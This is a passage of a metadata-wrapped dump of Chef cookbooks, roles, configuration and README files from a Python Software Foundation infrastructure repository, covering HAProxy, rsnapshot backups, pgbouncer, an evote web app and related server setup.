"content_id": "ddb141904f2fb2fffc455d26a891d2c7fb07ca32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2458,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 85,
"path": "/cookbooks/haproxy/providers/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n group new_resource.group do\n system true\n end\n\n user new_resource.user do\n comment \"#{new_resource.name} HAProxy service\"\n gid new_resource.group\n system true\n shell '/bin/false'\n home new_resource.config_directory\n end\n\n directory new_resource.config_directory do\n owner 'root'\n group 'root'\n mode '755'\n end\n\n directory \"#{new_resource.config_directory}/conf.d\" do\n owner 'root'\n group 'root'\n mode '755'\n end\n\n package_file_name = \"haproxy_1.5-dev22-r1_amd64.deb\"\n\n cookbook_file \"#{Chef::Config[:file_cache_path]}/#{package_file_name}\" do\n source package_file_name\n cookbook 'haproxy'\n owner 'root'\n group 'root'\n mode '644'\n end\n\n dpkg_package 'haproxy' do\n source \"#{Chef::Config[:file_cache_path]}/#{package_file_name}\"\n notifies :reload, new_resource\n end\n\n template \"/etc/init.d/#{new_resource.resource_name}\" do\n source new_resource.service_template || 'init.erb'\n cookbook new_resource.service_template ? new_resource.cookbook_name.to_s : 'haproxy'\n owner 'root'\n group 'root'\n mode '744'\n variables :haproxy => new_resource\n notifies :restart, \"service[#{new_resource.resource_name}]\"\n end\n\n service new_resource.resource_name do\n action [:enable, :start]\n supports :reload => true, :status => true\n end\n\n haproxy_section 'global' do\n haproxy new_resource.name\n source 'global.cfg.erb'\n cookbook 'haproxy'\n variables :haproxy => new_resource\n end\nend\n\naction :reload do\n # Complicated nonsense becaue Ruby doesn't define sort as stable and I want to sort by sections and then paths\n section_load_order = %w{global defaults listen frontend backend other}\n section_load_re = Regexp.new(\"^(#{section_load_order.join('|')})\")\n sections = section_load_order.inject({}){|memo, section| memo[section] = []; memo}\n Dir[\"#{new_resource.config_directory}/conf.d/*.cfg\"].each do |path|\n md = section_load_re.match(::File.basename(path))\n sections[md ? md[1] : 'other'] << path\n end\n config_content = section_load_order.map do |section|\n sections[section].sort!.map!{|path| ::File.read(path) }.join(\"\\n\")\n end.join(\"\\n\")\n file \"#{new_resource.config_directory}/haproxy.cfg\" do\n action :nothing\n owner 'root'\n group 'root'\n mode '644'\n content config_content\n end.run_action(:create)\n\n run_context.resource_collection.find(\"service[#{new_resource.resource_name}]\").run_action(:reload)\nend\n"
},
{
"alpha_fraction": 0.5413534045219421,
"alphanum_fraction": 0.5639097690582275,
"avg_line_length": 28.55555534362793,
"blob_id": "680d834f3abd605dc964603e3289edcc0384e2eb",
"content_id": "7bfb2a4449d45e8aeae879b9d84efffae59ecd5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 9,
"path": "/cookbooks/psf-moin/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"moin\"\nmaintainer \"Noah Kantrowitz\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Installs and configures moinmoin for wiki.python.org\"\nversion \"0.0.2\"\n\ndepends \"apache2\"\ndepends \"python\"\n"
},
{
"alpha_fraction": 0.6591175198554993,
"alphanum_fraction": 0.663803219795227,
"avg_line_length": 57.20454406738281,
"blob_id": "acd80fea5405bcdf6e54302fffcc7943efd49ec8",
"content_id": "be74247155b5820cf203daca5ed162fe3fb428ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2561,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 44,
"path": "/cookbooks/rsnapshot/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default['rsnapshot']['server']['dir'] = '/etc'\ndefault['rsnapshot']['server']['config_version'] = '1.2'\ndefault['rsnapshot']['server']['snapshot_root'] = '/var/cache/rsnapshot'\ndefault['rsnapshot']['server']['no_create_root'] = false\ndefault['rsnapshot']['server']['cmd_cp'] = '/bin/cp'\ndefault['rsnapshot']['server']['cmd_rm'] = '/bin/rm'\ndefault['rsnapshot']['server']['cmd_rsync'] = '/usr/bin/rsync'\ndefault['rsnapshot']['server']['cmd_ssh'] = '/usr/bin/ssh'\ndefault['rsnapshot']['server']['cmd_logger'] = '/usr/bin/logger'\ndefault['rsnapshot']['server']['cmd_du'] = '/usr/bin/du'\ndefault['rsnapshot']['server']['cmd_rsnapshot_diff'] = '/usr/bin/rsnapshot-diff'\ndefault['rsnapshot']['server']['cmd_preexec'] = nil\ndefault['rsnapshot']['server']['cmd_postexec'] = nil\ndefault['rsnapshot']['server']['linux_lvm_cmd_lvcreate'] = nil\ndefault['rsnapshot']['server']['linux_lvm_cmd_lvremove'] = nil\ndefault['rsnapshot']['server']['linux_lvm_cmd_mount'] = nil\ndefault['rsnapshot']['server']['linux_lvm_cmd_umount'] = nil\ndefault['rsnapshot']['server']['verbose'] = 2\ndefault['rsnapshot']['server']['loglevel'] = 3\ndefault['rsnapshot']['server']['logfile'] = nil\ndefault['rsnapshot']['server']['lockfile'] = '/var/run/rsnapshot.pid'\ndefault['rsnapshot']['server']['stop_on_stale_lockfile'] = true\ndefault['rsnapshot']['server']['rsync_short_args'] = '-a'\ndefault['rsnapshot']['server']['rsync_long_args'] = '--delete --numeric-ids --relative --delete-excluded'\ndefault['rsnapshot']['server']['ssh_args'] = '-i /root/.ssh/id_rsnapshot -o StrictHostKeyChecking=no'\ndefault['rsnapshot']['server']['du_args'] = '-csh'\ndefault['rsnapshot']['server']['one_fs'] = false\ndefault['rsnapshot']['server']['link_dest'] = false\ndefault['rsnapshot']['server']['sync_first'] = false\ndefault['rsnapshot']['server']['use_lazy_deletes'] = false\ndefault['rsnapshot']['server']['rsync_numtries'] = nil\ndefault['rsnapshot']['server']['linux_lvm_snapshotsize'] = nil\ndefault['rsnapshot']['server']['linux_lvm_snapshotname'] = nil\ndefault['rsnapshot']['server']['linux_lvm_vgpath'] = nil\ndefault['rsnapshot']['server']['linux_lvm_mountpath'] = nil\n\ndefault['rsnapshot']['server']['retain']['hourly']['count'] = 12\ndefault['rsnapshot']['server']['retain']['hourly']['minute'] = 0\ndefault['rsnapshot']['server']['retain']['hourly']['hour'] = '*/4'\ndefault['rsnapshot']['server']['retain']['daily']['count'] = 14\ndefault['rsnapshot']['server']['retain']['daily']['minute'] = 0\ndefault['rsnapshot']['server']['retain']['daily']['hour'] = 0\n\ndefault['rsnapshot']['client']['server_role'] = nil\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 34,
"blob_id": "cab4741749b3302b5f5515b9b39931deab1a111c",
"content_id": "5db39b994bfda8035e0c28ab8bc51539acf18ceb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 1,
"path": "/cookbooks/rsnapshot/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "include_recipe 'rsnapshot::client'\n"
},
{
"alpha_fraction": 0.5326633453369141,
"alphanum_fraction": 0.7462311387062073,
"avg_line_length": 55.85714340209961,
"blob_id": "5373760e86f0b5dfff9c065cf84ea3b4aa8ccacc",
"content_id": "5111e05365c95199c6c410fc2da5a547a7cacf1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 398,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 7,
"path": "/cookbooks/psf-pycon/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default['nodejs']['version'] = \"0.10.11\"\ndefault['nodejs']['src_url'] = \"http://nodejs.org/dist\"\ndefault['nodejs']['dir'] = \"/usr/local\"\ndefault['nodejs']['checksum_linux_x64'] = '0fa2be9b44d6acd4bd43908bade00053de35e6e27f72a2dc41d072c86263b52a'\ndefault['nodejs']['checksum_linux_x86'] = '2a08c5d1e19591ec8ea0fbd54f7a17ebbce447eb6b98d1a89392969cee24c949'\n\nnode.set['postgresql']['version'] = '9.3'\n"
},
{
"alpha_fraction": 0.6715958118438721,
"alphanum_fraction": 0.6900801062583923,
"avg_line_length": 19.80769157409668,
"blob_id": "f31d2bd0c11b932993e9c66ceeabbd0c94172582",
"content_id": "9335c1254fbe19fd12baa397fbb348bcfa6e4f93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1623,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 78,
"path": "/cookbooks/psf-evote/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#\n# Cookbook Name:: psf-evote\n# Recipe:: default\n#\n# Copyright (C) 2013 Noah Kantrowitz\n#\n\ninclude_recipe 'git'\ninclude_recipe 'python'\ninclude_recipe 'gunicorn'\ninclude_recipe 'supervisor'\n\ngroup 'evote' do\n system true\nend\n\nuser 'evote' do\n comment 'evote service'\n gid 'evote'\n system true\n shell '/bin/false'\n home '/srv/evote'\nend\n\ndirectory '/srv/evote' do\n owner 'evote'\n group 'evote'\nend\n\ngit '/srv/evote/web2py' do\n repository 'https://github.com/web2py/web2py.git'\n reference 'R-2.5.1'\n user 'evote'\nend\n\n%w{welcome examples admin}.each do |app|\n directory \"/srv/evote/web2py/applications/#{app}\" do\n action :delete\n recursive true\n end\nend\n\ngit '/srv/evote/web2py/applications/init' do\n repository 'https://github.com/mdipierro/evote.git'\n reference 'master'\n user 'evote'\nend\n\ndburi = if Chef::Config[:solo]\n 'sqlite://storage.sqlite' # For local testing\nelse\n db = data_bag_item('secrets', 'postgres')['evote']\n \"postgres://#{db['user']}:#{db['password']}@#{db['hostname']}/#{db['database']}\"\nend\n\ntemplate '/srv/evote/web2py/applications/init/models/0.py' do\n source '0.py.erb'\n owner 'evote'\n group 'evote'\n mode '644'\n variables node['psf-evote'].merge(:dburi => dburi)\nend\n\npython_pip 'rsa'\n\nsupervisor_service 'evote' do\n command 'gunicorn -b 0.0.0.0 -w 4 wsgihandler'\n autostart true\n user 'evote'\n directory '/srv/evote/web2py'\n subscribes :restart, 'template[/srv/evote/web2py/applications/init/models/0.py]'\nend\n\ncron 'expire_evote_sessions' do\n minute 0\n command 'cd /srv/evote/web2py && python web2py.py -S init -M -R scripts/sessions2trash.py -A -o'\n user 'evote'\nend\n"
},
{
"alpha_fraction": 0.6460674405097961,
"alphanum_fraction": 0.7387640476226807,
"avg_line_length": 49.85714340209961,
"blob_id": "96e6622de7d35c2daf457cd7daad7fb2c5353e9b",
"content_id": "f152d7fdb8cd3468ee2176d34fca8c926d781c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 712,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 14,
"path": "/cookbooks/stud/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Steps to build this custom stud package:\n\nNote that we are using a fork off the bumptech repo, this is for SNI support with wildcards.\nSee https://github.com/bumptech/stud/pull/126 for details. Make sure you rev the second\ncomponent of the version number (2, below) each time.\n\n1. sudo aptitude install build-essential git libev-dev ruby1.9.1 ruby1.9.1-dev\n2. git clone https://github.com/firebase/stud.git\n2.5 git checkout ef1745b7bfbac9eee9045ca9d90487c763b21490\n3. Edit Makefile so that PREFIX=/usr\n4. make\n5. sudo make install\n6. sudo gem install fpm\n7. fpm -s dir -t deb -n stud -v 0.3-2-ef1745 -C / -d 'libc6 >= 2.4' -d 'libev4 >= 1:4.04' -d 'libssl1.0.0 >= 1.0.0' /usr/bin/stud /usr/share/man/man8/stud.8\n"
},
{
"alpha_fraction": 0.6529209613800049,
"alphanum_fraction": 0.6701030731201172,
"avg_line_length": 28.100000381469727,
"blob_id": "212728636efeba4c05018eb62de8f8b9d94271c4",
"content_id": "5a8e0562a720c9e63d475e628de30ef4d2698859",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 10,
"path": "/cookbooks/pypy-home/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "maintainer \"Alex Gaynor\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Configuration for pypy.org\"\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion \"0.0.2\"\n\ndepends \"sudo\"\ndepends \"application_nginx\"\ndepends \"mercurial\"\n"
},
{
"alpha_fraction": 0.7371806502342224,
"alphanum_fraction": 0.7377166152000427,
"avg_line_length": 37.0748291015625,
"blob_id": "2882bfe0e5509fa1809cd426fdea46de70d9547f",
"content_id": "210b8e37ddb7d97eb789dbe96ec6658a2b13b749",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5597,
"license_type": "no_license",
"max_line_length": 376,
"num_lines": 147,
"path": "/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Overview\n========\n\nEvery Chef installation needs a Chef Repository. This is the place where cookbooks, roles, config files and other artifacts for managing systems with Chef will live. We strongly recommend storing this repository in a version control system such as Git and treat it like source code.\n\nWhile we prefer Git, and make this repository available via GitHub, you are welcome to download a tar or zip archive and use your favorite version control system to manage the code.\n\nRepository Directories\n======================\n\nThis repository contains several directories, and each directory contains a README file that describes what it is for in greater detail, and how to use it for managing your systems with Chef.\n\n* `certificates/` - SSL certificates generated by `rake ssl_cert` live here.\n* `config/` - Contains the Rake configuration file, `rake.rb`.\n* `cookbooks/` - Cookbooks you download or create.\n* `data_bags/` - Store data bags and items in .json in the repository.\n* `roles/` - Store roles in .rb or .json in the repository.\n\nRake Tasks\n==========\n\nThe repository contains a `Rakefile` that includes tasks that are installed with the Chef libraries. To view the tasks available with in the repository with a brief description, run `rake -T`.\n\nThe default task (`default`) is run when executing `rake` with no arguments. It will call the task `test_cookbooks`.\n\nThe following tasks are not directly replaced by knife sub-commands.\n\n* `bundle_cookbook[cookbook]` - Creates cookbook tarballs in the `pkgs/` dir.\n* `install` - Calls `update`, `roles` and `upload_cookbooks` Rake tasks.\n* `ssl_cert` - Create self-signed SSL certificates in `certificates/` dir.\n* `update` - Update the repository from source control server, understands git and svn.\n* `docs` - Builds documentation\n* `docs:publish` - Publish docs to readthedocs.org\n\nThe following tasks duplicate functionality from knife and may be removed in a future version of Chef.\n\n* `metadata` - replaced by `knife cookbook metadata -a`.\n* `new_cookbook` - replaced by `knife cookbook create`.\n* `role[role_name]` - replaced by `knife role from file`.\n* `roles` - iterates over the roles and uploads with `knife role from file`.\n* `test_cookbooks` - replaced by `knife cookbook test -a`.\n* `test_cookbook[cookbook]` - replaced by `knife cookbook test COOKBOOK`.\n* `upload_cookbooks` - replaced by `knife cookbook upload -a`.\n* `upload_cookbook[cookbook]` - replaced by `knife cookbook upload COOKBOOK`.\n\nConfiguration\n=============\n\nThe repository uses two configuration files.\n\n* ```config/rake.rb```\n* ```.chef/knife.rb```\n\nThe first, `config/rake.rb` configures the Rakefile in two sections.\n\n* Constants used in the `ssl_cert` task for creating the certificates.\n* Constants that set the directory locations used in various tasks.\n\nIf you use the `ssl_cert` task, change the values in the `config/rake.rb` file appropriately. These values were also used in the `new_cookbook` task, but that task is replaced by the `knife cookbook create` command which can be configured below.\n\nThe second config file, `.chef/knife.rb` is a repository specific configuration file for knife. If you're using the Opscode Platform, you can download one for your organization from the management console. If you're using the Open Source Chef Server, you can generate a new one with `knife configure`. For more information about configuring Knife, see the Knife documentation.\n\nhttp://help.opscode.com/faqs/chefbasics/knife\n\nSetting up a development environment\n====================================\n\nSome things you'll need:\n\n * this repo, cloned locally\n * ruby 1.9\n * the chef validator key\n * a valid chef client key\n\nSome things to consider:\n\n * rbenv: https://github.com/sstephenson/rbenv (via rbenv installer https://github.com/fesplugas/rbenv-installer)\n\nSome common steps:\n\n $ gem install bundler\n\n # get our ruby dependencies\n # Create local binstubs and install the gems right here.\n $ bundle install --binstubs --path .gems\n\n # get our chef cookbook dependencies\n $ bundle exec berks install\n\nManaging Cookbooks\n==================\n\nWe use berkshelf to manage our cookbooks and dependencies. Berkshelf is\nstraight forward.\n\nTo get started with it, look here: http://berkshelf.com/\n\nFrom the command line, it looks like this:\n\nList all of our cookbooks\n\n $ bundle exec berks list\n\nInstall all our 3rd party dependencies. Note that if you do not run berks\nupdate, a Lockfile will not be generated, and uploads will fail.\n\n $ bundle exec berks install && bundle exec berks update\n\nUpload a cookbook managed by berkshelf\n\n $ bundle exec berks upload <cookbook>\n\nUpload all cookbooks\n\n $ bundle exec berks upload\n\nCreate a new cookbook\n\n $ bundle exec berks cookbook <cookbook_name>\n\nTesting chef server interactions\n================================\n\nWe have conveniently included the \"chef-zero\" gem in our bundle. It will act as a local\nchef server, allowing you to test things like uploads and other chef server\ninteractions. We have also included a berkshelf config that will use the\nchef-zero server, as well as a fake key to test with.\n\nI'd suggest using tmux or screen for this...\n\nHere's how to use it:\n\nIn one terminal, fire up chef-zero:\n\n $ bundle exec chef-zero\n\nIn another, run some berks stuff:\n\n $ bundle exec berks upload -c .berkshelf-test-config.js\n\nYou can optionally add a --debug flag to the above command to see tons of\nextra output.\n\nNext Steps\n==========\n\nRead the README file in each of the subdirectories for more information about what goes in those directories.\n"
},
{
"alpha_fraction": 0.6650000214576721,
"alphanum_fraction": 0.6650000214576721,
"avg_line_length": 17.18181800842285,
"blob_id": "54b9f4d23abd7e984a20be39c8a1b062599323c1",
"content_id": "8de5b1c2e54fbb0da0d0e0e2a337eec8583ef5a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 11,
"path": "/roles/postfix-relay.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"postfix-relay\"\ndescription \"Utility role to install an outbound SMTP relay\"\nrun_list [\n \"recipe[postfix]\",\n]\n\noverride_attributes({\n :postfix => {\n :relayhost => 'mail.python.org',\n },\n})\n"
},
{
"alpha_fraction": 0.6935251951217651,
"alphanum_fraction": 0.7079136967658997,
"avg_line_length": 59.434783935546875,
"blob_id": "6e32df91d4776ecc55ccc9171163606682011c4b",
"content_id": "013056eac13ee9eb4c366059738a31faa6623ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1390,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 23,
"path": "/cookbooks/pgbouncer/resources/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\n\n# Administrative settings\nattribute :logfile, :kind_of => String, :default => '/var/log/postgresql/pgbouncer.log'\nattribute :pidfile, :kind_of => String, :default => '/var/run/postgresql/pgbouncer.pid'\n# Where to wait for clients\nattribute :listen_addr, :kind_of => String, :default => '127.0.0.1'\nattribute :listen_port, :kind_of => [String, Integer], :default => 5432\nattribute :unix_socket_dir, :kind_of => String, :default => '/var/run/postgresql'\n# Authentication settings\nattribute :auth_type, :equal_to => %w{any trust plain crypt md5}, :default => 'md5'\nattribute :auth_file, :kind_of => [String, NilClass], :default => '/etc/pgbouncer/users'\n# Users allowed into database 'pgbouncer'\nattribute :admin_users, :kind_of => [String, Array, NilClass]\nattribute :stats_users, :kind_of => [String, Array, NilClass]\n# Pooler personality questions\nattribute :pool_mode, :equal_to => %w{session transaction statement}, :default => 'session'\nattribute :server_reset_query, :kind_of => [String, NilClass], :default => 'DISCARD ALL;'\nattribute :server_check_query, :kind_of => [String, NilClass], :default => 'SELECT 1;'\nattribute :server_check_delay, :kind_of => [String, Integer], :default => 10\n# Connection limits\nattribute :max_client_conn, :kind_of => [String, Integer], :default => 100\nattribute :default_pool_size, :kind_of => [String, Integer], :default => 40\n"
},
{
"alpha_fraction": 0.6333333253860474,
"alphanum_fraction": 0.6541666388511658,
"avg_line_length": 39,
"blob_id": "a522fab0ffe08bf6e132703bba39220c570641a1",
"content_id": "691643e1704a54ea97f2ebbcd17feed7222c2818",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 6,
"path": "/cookbooks/psf-advocacy/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "maintainer \"Martin von Löwis\"\nmaintainer_email \"\"\nlicense \"Apache 2.0\"\ndescription \"Configuration related to the PSF advocacy site\"\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion \"0.0.1\"\n"
},
{
"alpha_fraction": 0.6377840638160706,
"alphanum_fraction": 0.6799242496490479,
"avg_line_length": 27.931507110595703,
"blob_id": "386680e7b9ec68fa1c1134fe8f27eecbaea248ef",
"content_id": "6124fc39f166e6a9b918530e1792e3975b337531",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2112,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 73,
"path": "/cookbooks/user/CHANGELOG.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "## 0.2.13 (unreleased)\n\n\n## 0.2.12 (May 1, 2012)\n\n### Bug fixes\n\n* user_account LWRP now notifies when updated (FC017). ([@fnichol][])\n* Add plaform equivalents in default attrs (FC024). ([@fnichol][])\n\n### Improvements\n\n* Add unit testing for user_account resource. ([@fnichol][])\n* Add unit testing for attributes. ([@fnichol][])\n* Add TravisCI to run test suite and Foodcritic linter. ([@fnichol][])\n* Reorganize README with section links. ([@fnichol][])\n* Pull request [#7](https://github.com/fnichol/chef-user/pull/7): Fix semantic issues in README. ([@nathenharvey][])\n\n\n## 0.2.10 (January 20, 2012)\n\n### Bug fixes\n\n* Pull request [#6](https://github.com/fnichol/chef-user/pull/6): Fix ordering of user deletion in :remove action. ([@nessche][])\n\n### Improvements\n\n* Issue [#4](https://github.com/fnichol/chef-user/issues/4): Support Ruby 1.8.6 (no #end_with?). ([@fnichol][])\n* Issue [#3](https://github.com/fnichol/chef-user/issues/3): Mention dependency on ruby-shadow if managing password. ([@fnichol][])\n* Issue [#5](https://github.com/fnichol/chef-user/issues/5): Clarify iteration through node['users'] in recipe[user::data_bag]. ([@fnichol][])\n\n\n## 0.2.8 (January 20, 2012)\n\n### Improvements\n\n* Handle user names with periods in them. ([@fnichol][])\n\n\n## 0.2.6 (October 18, 2011)\n\n### Improvements\n\n* Data bag item attribute `username` can override `id` for users with illegal data bag characters. ([@fnichol])\n\n\n## 0.2.4 (September 19, 2011)\n\n### Bug fixes\n\n* Fix data bag missing error message. ([@fnichol][])\n\n\n## 0.2.2 (September 14, 2011)\n\n### Bug fixes\n\n* Issue [#2](https://github.com/fnichol/chef-user/issues/2): user_account resource should accept String or Integer for uid attribute. ([@fnichol][])\n* Add home and shell defaults for SuSE. ([@fnichol][])\n\n### Improvements\n\n* Add installation instructions to README. ([@fnichol][])\n* Add fallback default `home_root` attribute value of \"/home\". ([@fnichol][])\n\n\n## 0.2.0 (August 12, 2011)\n\nThe initial release.\n\n[@fnichol]: https://github.com/fnichol\n[@nathenharvey]: https://github.com/nathenharvey\n[@nessche]: https://github.com/nessche\n"
},
{
"alpha_fraction": 0.6287015676498413,
"alphanum_fraction": 0.6309794783592224,
"avg_line_length": 61.71428680419922,
"blob_id": "e0f4b1a87fb8c9a65e5caf9a71944953695bc669",
"content_id": "66f0c0fd0d21dab48362fa9282623e6c05dca6cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 439,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 7,
"path": "/cookbooks/rsnapshot/resources/retain.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "attribute :name, :kind_of => String, :name_attribute => true\nattribute :count, :kind_of => Integer, :default => 1\nattribute :minute, :kind_of => [Integer, String], :default => '*'\nattribute :hour, :kind_of => [Integer, String], :default => '*'\nattribute :day, :kind_of => [Integer, String], :default => '*'\nattribute :month, :kind_of => [Integer, String], :default => '*'\nattribute :weekday, :kind_of => [Integer, String], :default => '*'\n"
},
{
"alpha_fraction": 0.623501181602478,
"alphanum_fraction": 0.7386091351509094,
"avg_line_length": 51.125,
"blob_id": "e2c8654b3b7941de3db6e1e3623dc67d7a091cde",
"content_id": "963b3af923deae5db81f3bc52e86fa7ae3bcaab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 8,
"path": "/cookbooks/psf-monitoring/Berksfile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "site :opscode\n\ncookbook \"collectd\", :git => \"https://github.com/miah/chef-collectd.git\", :ref => \"tags/1.0.8\"\ncookbook \"riemann\", :git => \"https://github.com/benjaminws/riemann-chef.git\", :ref => \"a6882ef7bad0d842f42f2fa97acbefd7d0d29c38\"\ncookbook \"runit\"\ncookbook \"graphite\", :git => \"git://github.com/hw-cookbooks/graphite.git\", :ref => \"39b0e35d437a7a8d4a8ce09e2617fdda4c917801\"\ncookbook \"apt\"\ncookbook \"firewall\"\n"
},
{
"alpha_fraction": 0.6918238997459412,
"alphanum_fraction": 0.6918238997459412,
"avg_line_length": 27.058822631835938,
"blob_id": "8a0286cfba86c88cfc98211a69ee731b4c085cd2",
"content_id": "9efe8db90b2452700c9d47e22ef8ee2f24bdd3e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 17,
"path": "/cookbooks/haproxy/resources/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\nactions :reload\n\nattribute :name, :name_attribute => true\nattribute :config_template, :kind_of => String\nattribute :service_template, :kind_of => String\nattribute :config_directory, :kind_of => String, :default => '/etc/haproxy'\nattribute :user, :kind_of => String, :default => 'haproxy'\nattribute :group, :kind_of => String, :default => 'haproxy'\n\ndef resource_name\n if self.name != 'haproxy'\n \"haproxy-#{self.name}\"\n else\n 'haproxy'\n end\nend\n"
},
{
"alpha_fraction": 0.7150837779045105,
"alphanum_fraction": 0.7150837779045105,
"avg_line_length": 24.571428298950195,
"blob_id": "9291c2bdd467dbc220ed2b43b215fc94ce5a0b76",
"content_id": "21c77fb12adbacdafb2eaf4be16560a4163d202f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 7,
"path": "/roles/pypy-codespeed.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"pypy-codespeed\"\ndescription \"Frontend for PyPy codespeed instance\"\n# Owner: Alex Gaynor <[email protected]>\nrun_list [\n \"recipe[pypy-codespeed::pgbouncer]\",\n \"recipe[pypy-codespeed]\",\n]\n"
},
{
"alpha_fraction": 0.6475620269775391,
"alphanum_fraction": 0.6484174728393555,
"avg_line_length": 43.96154022216797,
"blob_id": "9ba776b1d7f1e331f1fdbad370d46ef4235397c9",
"content_id": "2d550bdd3c987d3e60f127dc19fda3dcf95e51c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1169,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 26,
"path": "/.chef/knife.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Some sane defaults\nlog_level :info\nlog_location STDOUT\nnode_name ENV[\"CHEF_USER\"] || ENV[\"USER\"]\nclient_key File.expand_path(\"~/.chef/#{node_name}.pem\")\n\n# Load a user config file if present\nuser_config = File.expand_path(\"~/.chef/knife.rb\")\nif File.exist?(user_config)\n ::Chef::Log.info(\"Loading user-specific configuration from #{user_config}\") if defined?(::Chef)\n instance_eval(IO.read(user_config), user_config, 1)\nend\n\n# Project-specific settings, can't be overriden by the user\ncurrent_dir = File.dirname(__FILE__)\nvalidation_client_name \"psf-validator\"\nvalidation_key File.join(current_dir, \"psf-validator.pem\")\nchef_server_url \"https://api.opscode.com/organizations/psf\"\ncache_type \"BasicFile\"\ncache_options :path => File.expand_path(\"~/.chef/checksums\")\ncookbook_path File.expand_path(\"../../cookbooks\", __FILE__)\nknife[:distro] = 'psf-osu'\n\nif !File.exists?(validation_key) && defined?(::Chef)\n ::Chef::Log.error \"validator key not found, you will be unable to bootstrap new nodes. Please contact [email protected] for a copy if needed\"\nend\n"
},
{
"alpha_fraction": 0.6369863152503967,
"alphanum_fraction": 0.6369863152503967,
"avg_line_length": 17.25,
"blob_id": "9b4ccaf55e98c4fcf7e7c8c88cd504ef176be493",
"content_id": "a792f68e88d71c74ea784f377c9b3b7ca00d06a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/roles/wiki.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"wiki\"\ndescription \"Python wiki site\"\n# Owner: Noah Kantrowitz <[email protected]> (I guess? Sigh)\n\nrun_list [\n 'recipe[psf-moin]',\n 'role[postfix-relay]',\n]\n"
},
{
"alpha_fraction": 0.588351845741272,
"alphanum_fraction": 0.5942947864532471,
"avg_line_length": 24.494949340820312,
"blob_id": "eee511a5e5975a60b9c1580e515b05a33c025c9f",
"content_id": "0763f1797dcbf69bf95714c9794bede07e6e6faf",
"detected_licenses": [
"Apache-2.0"
],
